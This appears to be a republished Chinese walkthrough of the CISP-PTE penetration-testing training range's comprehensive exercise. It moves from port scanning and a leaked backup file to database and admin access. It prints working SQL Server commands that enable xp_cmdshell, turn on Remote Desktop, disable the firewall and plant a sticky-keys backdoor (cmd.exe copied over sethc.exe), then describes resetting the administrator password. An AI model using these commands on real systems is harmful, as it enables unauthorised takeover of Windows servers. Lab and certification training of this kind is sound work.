cisp-pte靶场通关思路分享----综合题篇
作者:互联网
综合题目前只搞到一个靶场,一起来看看吧。。。
打开页面是这个样子的,
第一步:先来扫一下端口,爆破一下目录。
看来80端口是没有什么可搞得,再来看看8080端口。
8080端口是一个后台,还扫出了备份文件。
第二步:有了这个网站备份文件,当然要翻翻看,有没有什么账号密码什么的。
第三步:打开navicat连接,得来全不费工夫。
第四步:得到第一个key,接着再翻翻其他库,找找后台账号密码。
很顺利就找到了,不过需要解密
第五步,有了后台账号密码,登陆看看,没想到,这个key就在页面里。
第六步:登录进来以后,找找有没有上传点什么的。折腾了半天找了一堆无用的漏洞,上传点也上传不上去。这才想起来因为目标服务器系统是Windows 2003,所以可以利用数据库操作命令关闭系统防火墙,写入cmd弹窗木马。
这里把代码贴给大家:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
EXEC master.dbo.xp_cmdshell 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'
EXEC master.dbo.xp_cmdshell 'cd C:\WINDOWS\system'
EXEC master.dbo.xp_cmdshell 'copy cmd.exe c:\WINDOWS\system\sethc.exe' (这一操作不明白的建议看下结尾推荐的博文)
EXEC master.dbo.xp_cmdshell 'netstat -an'
想着建个用户就可以登录3389远程桌面了,但是谁想拒绝访问。
参考网上的解决办法 :
按5下shift 激活粘滞键,然后输入explorer.exe 刷新桌面,免密码选择计算机管理,修改administrator 密码
或者按5下后,输入计算机管理的单词:compmgmt.msc 调出计算机管理,改密码
进入桌面拿到key3
就这样修改密码,远程连接,就拿下最后一个key了。
后来查了下这个功能,才大致了解了。详细的参考下面这个博客。
https://www.cnblogs.com/hai-long/p/12038251.html
标签:dbo,cmdshell,EXEC,pte,端口,cisp,综合题,master,xp 来源: https://www.cnblogs.com/xyz315/p/14873842.html